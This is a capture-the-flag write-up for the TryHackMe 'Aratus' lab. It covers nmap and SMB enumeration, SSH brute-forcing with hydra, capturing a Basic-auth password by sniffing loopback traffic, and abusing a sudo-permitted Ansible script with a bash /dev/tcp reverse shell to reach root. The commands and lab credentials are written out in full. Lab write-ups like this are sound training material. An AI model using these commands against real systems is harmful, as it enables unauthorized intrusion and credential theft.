Aratus (SSH, Process, Ansible)

First, we need to enumerate using nmap.

$ nmap -A -p21,22,80,139,443 10.10.184.32

Starting Nmap 7.80 ( https://nmap.org ) at 2022-03-30 13:13 +0630
Nmap scan report for 10.10.184.32
Host is up (0.28s latency).

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0        0               6 Jun 09  2021 pub
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.9.0.140
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 09:23:62:a2:18:62:83:69:04:40:62:32:97:ff:3c:cd (RSA)
|   256 33:66:35:36:b0:68:06:32:c1:8a:f6:01:bc:43:38:ce (ECDSA)
|_  256 14:98:e3:84:70:55:e6:60:0c:c2:09:77:f8:b7:a6:1c (ED25519)
80/tcp  open  http        Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips
|_http-title: Apache HTTP Server Test Page powered by CentOS
139/tcp open  netbios-ssn Samba smbd 4.10.16 (workgroup: WORKGROUP)
Service Info: Host: ARATUS; OS: Unix

Host script results:
|_clock-skew: mean: -40m50s, deviation: 1h09m13s, median: -53s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.10.16)
|   Computer name: aratus
|   NetBIOS computer name: ARATUS\x00
|   Domain name: \x00
|   FQDN: aratus
|_  System time: 2022-03-30T08:43:22+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-03-30T06:43:21
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.70 seconds

Let's connect ftp and see what files are sharing. We found only pub diretory in this ftp. But no files are inside this directory.

➜  tryhackme ftp 10.10.184.32
Connected to 10.10.184.32.
220 (vsFTPd 3.0.2)
Name (10.10.184.32:hnl): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0               6 Jun 09  2021 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> 

Enumerate smb share and we found interesting share name temporary share

➜  tryhackme smbclient -L '\\10.10.184.32\'
Enter WORKGROUP\hnl's password: 
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	temporary share Disk      
	IPC$            IPC       IPC Service (Samba 4.10.16)
SMB1 disabled -- no workgroup available

Connect it and see what files store in this share. And download message-to-simeon.txt. When I download .bash_history or something, I got access denied error.

➜  tryhackme smbclient '\\10.10.184.32\temporary share'
Enter WORKGROUP\hnl's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Jan 10 19:36:44 2022
  ..                                  D        0  Tue Nov 23 22:54:05 2021
  .bash_logout                        H       18  Wed Apr  1 08:47:30 2020
  .bash_profile                       H      193  Wed Apr  1 08:47:30 2020
  .bashrc                             H      231  Wed Apr  1 08:47:30 2020
  .bash_history                       H        0  Wed Mar 30 13:07:29 2022
  chapter1                            D        0  Tue Nov 23 16:37:47 2021
  chapter2                            D        0  Tue Nov 23 16:38:11 2021a
  chapter3                            D        0  Tue Nov 23 16:38:18 2021
  chapter4                            D        0  Tue Nov 23 16:38:25 2021
  chapter5                            D        0  Tue Nov 23 16:38:33 2021
  chapter6                            D        0  Tue Nov 23 16:42:24 2021
  chapter7                            D        0  Tue Nov 23 17:44:27 2021
  chapter8                            D        0  Tue Nov 23 16:42:45 2021
  chapter9                            D        0  Tue Nov 23 16:42:53 2021
  .ssh                               DH        0  Mon Jan 10 19:35:34 2022
  .viminfo                            H        0  Wed Mar 30 13:07:29 2022
  message-to-simeon.txt               N      251  Mon Jan 10 19:36:44 2022

		37726212 blocks of size 1024. 35598956 blocks available
smb: \> get message-to-simeon.txt
getting file \message-to-simeon.txt of size 251 as message-to-simeon.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)

Read this interesting files. By reviewing message, he/she place the web directory on /home directory.

➜  aratus cat message-to-simeon.txt 
Simeon,

Stop messing with your home directory, you are moving files and directories insecurely!
Just make a folder in /opt for your book project...

Also you password is insecure, could you please change it? It is all over the place now!

- Theodore

Let's enumerate to http service. We found only default httpd website which is hosted on centos or redhat.

http://10.10.184.32/simeon/ point to you some interesting page. There are too many words in this page and subpage.

So, we will change those words into wordlist.

╭─kali@kali ~/Desktop/ctf/tryhackme/aratus  
╰─➤  cewl http://10.10.184.32/simeon/ --with-numbers > wordlists.txt

╭─kali@kali ~/Desktop/ctf/tryhackme/aratus  
╰─➤  cat wordlists.txt| wc -c 
1588

And then, we will bruteforce ssh using this wordlists.

╭─kali@kali ~/Desktop/ctf/tryhackme/aratus  
╰─➤  hydra -l simeon -P wordlists.txt ssh://10.10.184.32         
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-03-31 11:00:08
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 207 login tries (l:1/p:207), ~13 tries per task
[DATA] attacking ssh://10.10.184.32:22/
[22][ssh] host: 10.10.184.32   login: simeon   password: scelerisque
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-03-31 11:00:36

After bruteforcing it, you will found a vaild username and password. Let's login to ssh using this creds.

╭─kali@kali ~/Desktop/ctf/tryhackme/aratus  
╰─➤  ssh simeon@10.10.184.32
The authenticity of host '10.10.184.32 (10.10.184.32)' can't be established.
ECDSA key fingerprint is SHA256:5CxDqeYb3rPlNvmv3Hd+R2ZZuwoGQ/2fuul51QgP/N0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.184.32' (ECDSA) to the list of known hosts.
simeon@10.10.184.32's password: 
Last failed login: Thu Mar 31 16:59:44 CEST 2022 from ip-10-9-0-140.eu-west-1.compute.internal on ssh:notty
There were 34 failed login attempts since the last successful login.
Last login: Mon Jan 10 14:07:52 2022 from 172.16.42.100
[simeon@aratus ~]$ whoami
simeon

After checking some process, we found some interesting which is running ping command using root privileges.

Check again using pspy64, we found another interesting process which is run /home/theodore/scripts/test-www-auth.py

You already seen ping command is running with root privileges. Let's listen with tcpdump in loopback interface.

[simeon@aratus tmp]$ tcpdump -i lo -A[simeon@aratus tmp]$ tcpdump -i lo -A
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes
17:18:01.060141 IP localhost > localhost: ICMP echo request, id 2018, seq 1, length 64
E..T..@.@.b............7....).Eb............................ !"#$%&'()*+,-./01234567
17:18:01.060162 IP localhost > localhost: ICMP echo reply, id 2018, seq 1, length 64
E..T....@..............7....).Eb............................ !"#$%&'()*+,-./01234567
17:18:01.231426 IP localhost.39816 > localhost.http: Flags [S], seq 3134750690, win 43690, options [mss 65495,sackOK,TS val 1727142 ecr 0,nop,wscale 7], length 0
E..<%D@.@..v...........P.............0.........
..Z.........
17:18:01.231455 IP localhost.http > localhost.39816: Flags [S.], seq 2506469898, ack 3134750691, win 43690, options [mss 65495,sackOK,TS val 1727142 ecr 1727142,nop,wscale 7], length 0
E..<..@.@.<..........P...e.
.........0.........
..Z...Z.....
17:18:01.231470 IP localhost.39816 > localhost.http: Flags [.], ack 1, win 342, options [nop,nop,TS val 1727142 ecr 1727142], length 0
E..4%E@.@..}...........P.....e.....V.(.....
..Z...Z.
17:18:01.231734 IP localhost.39816 > localhost.http: Flags [P.], seq 1:224, ack 1, win 342, options [nop,nop,TS val 1727142 ecr 1727142], length 223: HTTP: GET /test-auth/index.html HTTP/1.1
E...%F@.@..............P.....e.....V.......
..Z...Z.GET /test-auth/index.html HTTP/1.1
Host: 127.0.0.1
User-Agent: python-requests/2.14.2
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Authorization: Basic dGhlb2RvcmU6UmlqeWFzd2FoZWJjZWliYXJqaWs=

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes
17:16:02.936270 IP localhost > localhost: ICMP echo request, id 1992, seq 2, length 64
17:16:02.936291 IP localhost > localhost: ICMP echo reply, id 1992, seq 2, length 64
17:16:03.936265 IP localhost > localhost: ICMP echo request, id 1992, seq 3, length 64
17:16:03.936287 IP localhost > localhost: ICMP echo reply, id 1992, seq 3, length 64
17:16:04.936267 IP localhost > localhost: ICMP echo request, id 1992, seq 4, length 64

Decode from base64. You will found theodore password.

╭─kali@kali ~/Desktop/tools  
╰─➤  echo 'dGhlb2RvcmU6UmlqeWFzd2FoZWJjZWliYXJqaWs=' | base64 -d
theodore:Rijyaswahebceibarjik                

Let's login ssh using theodore credentials.

╭─kali@kali ~/Desktop/tools  
╰─➤  ssh theodore@10.10.184.32 
theodore@10.10.184.32's password: 
Last login: Fri Mar 25 21:57:42 2022
[theodore@aratus ~]$ whoami
theodore
[theodore@aratus ~]$ cat /home/theodore/scripts/test-www-auth.py
#!/usr/bin/python3

import requests

url = "http://127.0.0.1/test-auth/index.html"
headers = {"Authorization" : "Basic dGhlb2RvcmU6UmlqeWFzd2FoZWJjZWliYXJqaWs="}

r = requests.get(url, headers=headers)
print(r)

With sudo -l command something is running with automation user privileges.

[theodore@aratus ~]$ sudo -l
Matching Defaults entries for theodore on aratus:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User theodore may run the following commands on aratus:
    (automation) NOPASSWD: /opt/scripts/infra_as_code.sh


[theodore@aratus ~]$ cat /opt/scripts/infra_as_code.sh
#!/bin/bash
cd /opt/ansible
/usr/bin/ansible-playbook /opt/ansible/playbooks/*.yaml

Ansible is running on this host. You can read what is ansible on google. It run all playbooks from this directory /opt/ansible/playbooks/.

[theodore@aratus tasks]$ pwd
/opt/ansible/roles/geerlingguy.apache/tasks
[theodore@aratus tasks]$ ls -al
total 36
drwxr-xr-x. 2 automation automation  228 Dec  2 11:55 .
drwxr-xr-x. 9 automation automation  178 Dec  2 11:55 ..
-rw-rw-r--. 1 automation automation 1693 Dec  2 11:55 configure-Debian.yml
-rw-rw-r--+ 1 automation automation 1123 Dec  2 11:55 configure-RedHat.yml
-rw-rw-r--. 1 automation automation  546 Dec  2 11:55 configure-Solaris.yml
-rw-rw-r--. 1 automation automation  711 Dec  2 11:55 configure-Suse.yml
-rw-rw-r--. 1 automation automation 1388 Dec  2 11:55 main.yml
-rw-rw-r--. 1 automation automation  193 Dec  2 11:55 setup-Debian.yml
-rw-rw-r--. 1 automation automation  198 Dec  2 11:55 setup-RedHat.yml
-rw-rw-r--. 1 automation automation  134 Dec  2 11:55 setup-Solaris.yml
-rw-rw-r--. 1 automation automation  133 Dec  2 11:55 setup-Suse.yml

We will create reverse shell file on /tmp directory.

[theodore@aratus tasks]$ cat /tmp/shell.sh
#!/bin/bash
bash -i >& /dev/tcp/10.9.0.140/9001 0>&1
[theodore@aratus tasks]$ chmod 777 /tmp/shell.sh

At the end of the file, we will insert this malicious definations.

Run this playbooks.

[theodore@aratus ~]$ sudo -u automation /opt/scripts/infra_as_code.sh

In netcat session, we got reverse shell.

╭─kali@kali ~/Desktop/ctf/tryhackme/aratus  
╰─➤  nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.9.0.140] from (UNKNOWN) [10.10.184.32] 32926
[root@aratus automation]# whoami;hostname
whoami;hostname
root
aratus